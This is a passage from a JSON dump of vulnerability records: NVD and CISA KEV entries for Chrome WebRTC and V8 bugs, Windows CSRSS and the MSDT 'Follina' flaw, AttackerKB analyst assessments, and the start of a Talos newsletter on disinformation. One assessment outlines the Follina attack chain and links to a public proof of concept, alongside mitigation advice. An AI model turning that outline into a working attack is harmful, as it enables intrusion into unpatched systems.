"cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:11:01", "description": "Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-28T02:15:00", "type": "cve", "title": "CVE-2022-2294", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294"], "modified": "2023-11-25T11:15:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:fedoraproject:fedora:35", "cpe:/a:webrtc_project:webrtc:-", "cpe:/o:fedoraproject:fedora:36", "cpe:/a:fedoraproject:extra_packages_for_enterprise_linux:8.0"], "id": "CVE-2022-2294", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-2294", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webrtc_project:webrtc:-:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:44:42", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T20:15:00", "type": "cve", "title": "CVE-2022-30190", "cwe": ["CWE-610"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-08T14:22:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-30190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:11:06", "description": "Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-28T02:15:00", "type": "cve", "title": "CVE-2022-2295", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2295"], "modified": "2023-11-07T03:46:00", "cpe": ["cpe:/o:fedoraproject:fedora:35", "cpe:/o:fedoraproject:fedora:36", "cpe:/a:fedoraproject:extra_packages_for_enterprise_linux:8.0"], "id": "CVE-2022-2295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-2295", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*"]}], "cisa_kev": [{"lastseen": "2023-12-06T16:20:37", "description": "Microsoft Windows CSRSS contains an unspecified vulnerability that allows for privilege escalation to SYSTEM privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Client Server Runtime Subsystem (CSRSS) Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T00:00:00", "id": "CISA-KEV-CVE-2022-22047", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T16:20:37", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T00:00:00", "id": "CISA-KEV-CVE-2022-30190", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T16:20:37", "description": "WebRTC, an open-source project providing web browsers with real-time communication, contains a heap buffer overflow vulnerability that allows an attacker to perform shellcode execution. This vulnerability impacts web browsers using WebRTC including but not limited to Google Chrome.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-25T00:00:00", "type": "cisa_kev", "title": "WebRTC Heap Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294"], "modified": "2022-08-25T00:00:00", "id": "CISA-KEV-CVE-2022-2294", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:35:35", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-22047", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2023-10-07T00:00:00", "id": "AKB:0B6E13D5-84E0-4D3E-BD21-781032FA30ED", "href": "https://attackerkb.com/topics/SzYymWZIy5/cve-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:35:39", "description": "Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at July 05, 2022 3:18am UTC reported:\n\nLooks like this was a heap buffer overflow in WebRTC which could allow for a drive by attack that would grant attackers RCE on a target system. No news as to whether or not this was used with a sandbox escape though, It was reported by Jan Vojtesek from the Avast Threat Intelligence team on 2022-07-01 according to <https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html>, yet interestingly <https://chromereleases.googleblog.com/2022/07/chrome-for-android-update.html> also note it affects Chrome for Android.\n\nThere is a real world exploit for this out in the wild but given the generally tight lipped news around this and that it was found from a threat intelligence team, I would imagine this may have been used in more targeted attacks, but still widely enough that a threat intelligence team picked up on it. Bit hard to tell though since I hadn\u2019t heard about the Avast Threat Intelligence team prior to this; I imagine its possible one of their customers was targeted selectively and then they found out and notified Google.\n\nWith heap overflow bugs I generally err on the side of \u201cwell these things are harder to exploit\u201d however with browsers you typically have access to a much wider arsenal to use for crafting the heap into a state that is desirable for exploitation purposes, so the risk is a bit higher here. That being said exploitation of such bugs tends to be a little more complex in most cases, particularly given recent mitigations. I\u2019d still recommend patching this one if you can, but if not then you should try to disable WebRTC on your browsers until you can patch given in the wild exploitation.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-28T00:00:00", "type": "attackerkb", "title": "CVE-2022-2294", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294"], "modified": "2023-10-08T00:00:00", "id": "AKB:23F2B591-FE1E-47A8-AA83-2DFAD7E5CE61", "href": "https://attackerkb.com/topics/42OzzPsFw0/cve-2022-2294", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:06", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at May 31, 2022 12:56pm UTC reported:\n\nEDIT: This was a quick description, and while it is still accurate as far as I know, A Rapid7 Evaluation with greater analysis has been published here: <https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>\n\nThis is a relatively new vulnerability in the Microsoft Support Diagnostic Tool Vulnerability, so it is likely more information will come out in the coming days. \nCurrently, as seen in the wild, this vulnerability is embedded in a word document and likely distributed with a *.rar file. When the Word document is opened, it reaches out and downloads an HTML file which has a JS section to implement the ms-msdt (Microsoft Support Diagnostic Tool Vulnerability) protocol which is then coerced into launching a command. \nAs reported by Jake Williams in a thread here: <https://twitter.com/MalwareJake/status/1531019243411623939>, the command opens the accomplanying `*.rar` file and pulls a base64 encoded `*.cab` file from it, then expands the *cab file and runs a file contained in the cab file called `rgb.exe` THIS FILENAME IS LIKELY MUTABLE, SO I DO NOT RECCOMMEND POLICING FOR IT WITHOUT OTHER RULES. \nMicrosoft has already published mitigation techniques for this exploit: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/> \nUsers are required to delete a single registry key called `HKEY_CLASSES_ROOT\\ms-msdt` though there is little discussion about the side effects of this operation. In his thread, Jake Williams has verified that the removal of this key prevents execution of the embedded payload. \nFurther reading: \n<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e> \nUntested and unverified PoC: <https://github.com/chvancooten/follina.py/blob/main/follina.py> \n<https://www.scythe.io/library/breaking-follina-msdt-vulnerability>\n\nUPDATE: I adjusted the attacker value up in light of reports by Kevin Beaumont that if the attacker uses an RTF file as the host, then the exploit code will run just viewing the file in the preview pane with explorer.exe. (details here: <https://github.com/JMousqueton/PoC-CVE-2022-30190> and the above doublepulsar blog post)\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "attackerkb", "title": "CVE-2022-30190", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2023-10-07T00:00:00", "id": "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "href": "https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2022-07-21T20:00:40", "description": "[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s16000/threat-source-newsletter.jpg)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n_By Jon Munshaw. _\n\n[![](https://blogger.googleusercontent.com/img/a/AVvXsEj-mJ-nkfcUqAs6gZvX8xS2acg2Gomq1k9sbhaev8z9XCZnVEc3hnBv_CAEBr5YFPKbzeHm615Hm1J6VmtXbPW-VDGf1Y6GkVCjPTnH973CDJSSnSoxB93Nru0Ohx-w8atdDxbRuYdx1wk5h-eUvHihWfJ9aTwOLINT1HzhDqTPflICljFmGplz6bX9=w114-h42)](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nI could spend time in this newsletter every week talking about fake news. There are always so many ridiculous memes, headlines, misleading stories, viral Facebook posts and manipulated media that I see come across my Instagram feed or via my wife when she shows me TikToks she favorited. \n\n \n\n\nOne recent event, though, was so crushing to me that I had to call it out specifically. [Former Japanese Prime Minister Shinzo Abe was assassinated](<https://www.nytimes.com/live/2022/07/08/world/japan-shinzo-abe-shooting>) earlier this month while making a campaign speech in public. This was a horrible tragedy marking the death of a powerful politician in one of the world\u2019s most influential countries. It was the top story in the world for several days and was even more shocking given Japan\u2019s strict gun laws and the relative infrequency of any global leaders being the target of violence. \n\n \n\n\nIt took no time for the internet at large to take this tragedy and immediately try to spin it to their whims to spread false narratives, disinformation and downright harmful fake stories that mar Abe\u2019s death and make a mockery of the 24/7 news cycle and the need for everyone to immediately have their own \u201ctake\u201d on social media. \n\n \n\n\nShortly after Abe\u2019s murder, a far-right French politician took a false claim from the infamous online forum 4chan that video game developer Hideo Kojima was the suspect who killed Abe and [shared it on Twitter.](<https://www.bbc.com/news/newsbeat-62121650>) The politician, Damien Rieu, even went as far to connect Kojima to the \u201cfar left,\u201d linking to pictures of the \u201cMetal Gear Solid\u201d creator wearing a shirt depicting the Joker and a bag with Che Guevara\u2019s face on it. Rieu\u2019s tweet was [taken as fact by a Greek television news station](<https://kotaku.com/shinzo-abe-assassin-killer-kojima-greek-news-confusion-1849157839>), which also [aired a report](<https://youtu.be/MfQPJggD1Us>) that Kojima was the assassin. \n\n \n\n\nThankfully, this claim was quickly debunked and the [politician issued an apology](<https://twitter.com/DamienRieu/status/1545460974592970752>), but Kojima and his company have [threatened legal action](<https://www.videogameschronicle.com/news/legal-action-threatened-as-hideo-kojima-falsely-linked-to-shinzo-abe-assassination/>) over the ordeal (as they should). This is an appalling scenario in which social media was quick to assign blame for Abe\u2019s assassination, then picked up by an influential person and even making it to a reputable international news station. This goes beyond the realm of the typical \u201cRussian bot\u201d fake news we think of this was a failure to run any simple fact checks before reporting a damning claim about someone. Imagine if it was just anyone who was blamed for Abe\u2019s assassination, and not someone like Kojima who has a very public platform and the funds to fight these claims. \n\n \n\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhptqreL2kFkNoBxL-NGrBPSwlnAY8sv3eiiN0bwTAACJXRiQB69a8jp752bncymBYSD_SC9JV3jCHn73HzQMV3s950OgaXzIbQM_4Kpd4_f2245CG2E1IXo8f7zW0qGxNO2hQ6F9fA3G4J1piu7ue3esWeL2eWi-0dXgDfUl3U4YH4QKkwPiCnZxfo/w210-h400/Screenshot_20220720-135745.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhptqreL2kFkNoBxL-NGrBPSwlnAY8sv3eiiN0bwTAACJXRiQB69a8jp752bncymBYSD_SC9JV3jCHn73HzQMV3s950OgaXzIbQM_4Kpd4_f2245CG2E1IXo8f7zW0qGxNO2hQ6F9fA3G4J1piu7ue3esWeL2eWi-0dXgDfUl3U4YH4QKkwPiCnZxfo/s2053/Screenshot_20220720-135745.png>)\n\nPeople also took the opportunity within the first few hours of Abe\u2019s death to try and craft their own narrative using fake news and misleading information. A viral claim that he was killed over his COVID-19-related policies made the rounds, though these claims were later proven [verifiably false](<https://www.statesman.com/story/news/politics/politifact/2022/07/13/fact-check-was-shinzo-abe-assassinated-over-covid-19-response/65372187007/>). Another completely fake and manipulated screenshot claimed to show that Abe had tweeted shortly before his death that he had incriminating news about [U.S. politician Hillary Clinton](<https://apnews.com/article/Fact-Check-Fake-Shinzo-Abe-Tweet-499806264509>). \n\n \n\n\nI went on Instagram and [found a still-active post](<https://www.instagram.com/p/Cf2CODKutKG/?igshid=YmMyMTA2M2Y=>) from an account with more than 54,000 followers that indicates that Abe was assassinated because he had less-than-strict COVID policies that did not align with the \u201cglobal agenda.\u201d Instagram flagged the post as \u201cmissing context,\u201d but does not flag it as downright false and the content is still accessible as of Wednesday afternoon. \n\n \n\n\nWhat disturbs me the most about this whole event is that nothing is off limits for social media users to bend to their whim. I suppose I can't say I\u2019m surprised \u2014 ESPN even recently fell for something as silly as a fake TikTok video alleging to show a [UPS driver dunking a basketball](<https://www.snopes.com/fact-check/ups-driver-dunk-car/>) while jumping over a car. But it is a stark reminder that when breaking news occurs, no matter how serious or dangerous it is, there\u2019s always going to be people online who will be spreading fake news, disinformation and/or misinformation. This makes me miss the days when the biggest fake news story out there was [Balloon 